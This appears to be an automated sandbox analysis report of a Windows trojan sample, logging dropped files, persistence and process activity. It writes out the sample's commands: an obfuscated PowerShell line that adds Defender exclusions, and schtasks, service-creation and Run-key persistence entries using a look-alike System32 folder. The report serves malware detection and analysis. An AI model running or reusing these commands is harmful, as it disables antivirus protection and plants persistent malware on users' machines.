    Source: C:\Windows \System32\printui.exeProcess created: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
    Source: C:\Windows \System32\printui.exeProcess created: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"Jump to behavior
    Suspicious powershell command line found
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"Jump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EAFE30 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,LoadLibraryExW,GetSystemDirectoryW,malloc,GetSystemDirectoryW,LoadLibraryW,free,GetProcAddress,QueryPerformanceFrequency,5_2_00007FF8B7EAFE30
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeStatic PE information: section name: .fptable
    Source: curlapp64.exe.0.drStatic PE information: section name: .fptable
    Source: prnttemp.dll.5.drStatic PE information: section name: .xdata
    Source: libiconv-2.dll.14.drStatic PE information: section name: .xdata
    Source: libiconv-2.dll.14.drStatic PE information: section name: /4
    Source: libiconv-2.dll.14.drStatic PE information: section name: /19
    Source: libiconv-2.dll.14.drStatic PE information: section name: /31
    Source: libiconv-2.dll.14.drStatic PE information: section name: /45
    Source: libiconv-2.dll.14.drStatic PE information: section name: /57
    Source: libiconv-2.dll.14.drStatic PE information: section name: /70
    Source: libiconv-2.dll.14.drStatic PE information: section name: /81
    Source: libiconv-2.dll.14.drStatic PE information: section name: /92
    Source: libintl-9.dll.14.drStatic PE information: section name: .xdata
    Source: libintl-9.dll.14.drStatic PE information: section name: /4
    Source: libintl-9.dll.14.drStatic PE information: section name: /19
    Source: libintl-9.dll.14.drStatic PE information: section name: /31
    Source: libintl-9.dll.14.drStatic PE information: section name: /45
    Source: libintl-9.dll.14.drStatic PE information: section name: /57
    Source: libintl-9.dll.14.drStatic PE information: section name: /70
    Source: libintl-9.dll.14.drStatic PE information: section name: /81
    Source: libintl-9.dll.14.drStatic PE information: section name: /92
    Source: libwinpthread-1.dll.14.drStatic PE information: section name: .xdata
    Source: console_zero.exe.14.drStatic PE information: section name: .fptable
    Source: vcruntime140d.dll.14.drStatic PE information: section name: _RDATA
    Source: bav64.exe.14.drStatic PE information: section name: .fptable
    Source: usvcldr64.dat.14.drStatic PE information: section name: .fptable
    Source: x882081.dat.14.drStatic PE information: section name: .fptable
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EACC08 push rdi; retn 0004h5_2_00007FF8B7EACC09
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EACC0C push rdx; ret 5_2_00007FF8B7EACC0D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FF8476CD2A5 pushad ; iretd 20_2_00007FF8476CD2A6
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FF8477E00BD pushad ; iretd 20_2_00007FF8477E00C1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FF8477E6FDA push edx; iretd 20_2_00007FF8477E6FDB
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FF8477E2A1D push ebx; iretd 20_2_00007FF8477E2A4A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FF8477E88FA push ebx; ret 20_2_00007FF8477E891A
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_649487B2 push r11; ret 49_2_649487ED
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_660224A8 push rax; retf 49_2_660224B1
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_6829984B push 00000000h; retf 49_2_68299850
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_682970AC push rax; iretd 49_2_682970AD
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_682951B2 push rdx; retn 0000h49_2_682951B3
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_6829998B push 00000000h; ret 49_2_68299990
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_6829999B push 00000000h; iretd 49_2_682999A0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_6829AA73 push 00000000h; ret 49_2_6829AA78
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_6829ABBB push 00000000h; retf 49_2_6829ABC0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_6829ABB3 push 00000000h; ret 49_2_6829ABB8
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_6829A7AB push 00000000h; iretd 49_2_6829A7B0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E4C2C8 push 680001C2h; retn 0001h49_2_00007FF8B7E4C2CD
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E4C2D0 push 680001C2h; retn 0001h49_2_00007FF8B7E4C2D5
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E4C2B8 push 050001C2h; retn 0001h49_2_00007FF8B7E4C2C5
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B810CC08 push rdi; retn 0004h49_2_00007FF8B810CC09
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B810CC0C push rdx; ret 49_2_00007FF8B810CC0D
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B810CC08 push rdi; retn 0004h55_2_00007FF8B810CC09
    Source: C:\Windows\System32\console_zero.exeCode function: 55_2_00007FF8B810CC0C push rdx; ret 55_2_00007FF8B810CC0D

    Persistence and Installation Behavior

    barindex
    Creates a Windows Service pointing to an executable in C:\Windows
    Source: C:\Windows\System32\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x882081\Parameters ServiceDll C:\Windows\System32\x882081.dat
    Drops executables to the windows directory (C:\Windows) and starts them
    Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\System32\console_zero.exe
    Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\System32\bav64.exe
    Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows \System32\printui.exeJump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeFile created: C:\Windows \System32\printui.exeJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dllJump to dropped file
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeFile created: C:\Users\user\Desktop\libcurl.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dllJump to dropped file
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeFile created: C:\Users\user\Desktop\curlapp64.exeJump to dropped file
    Source: C:\Users\user\Desktop\curlapp64.exeFile created: C:\Windows \System32\printui.dll (copy)Jump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x882081.datJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\bav64.exeJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exeJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\usvcldr64.datJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dllJump to dropped file
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeFile created: C:\Users\user\Desktop\zlib1.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dllJump to dropped file
    Source: C:\Users\user\Desktop\curlapp64.exeFile created: C:\Users\user\Desktop\prnttemp.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dllJump to dropped file
    Source: C:\Users\user\Desktop\curlapp64.exeFile created: C:\Windows \System32\printui.exeJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dllJump to dropped file
    Source: C:\Users\user\Desktop\curlapp64.exeFile created: C:\Windows \System32\printui.dll (copy)Jump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x882081.datJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\bav64.exeJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exeJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\usvcldr64.datJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dllJump to dropped file
    Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dllJump to dropped file

    Boot Survival

    barindex
    Uses schtasks.exe or at.exe to add and modify task schedules
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
    Source: C:\Windows\System32\reg.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x882081\Parameters
    Source: C:\Users\user\Desktop\curlapp64.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run curlapp64Jump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run curlapp64Jump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run curlapp64Jump to behavior
    Source: C:\Users\user\Desktop\curlapp64.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run curlapp64Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x882081 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
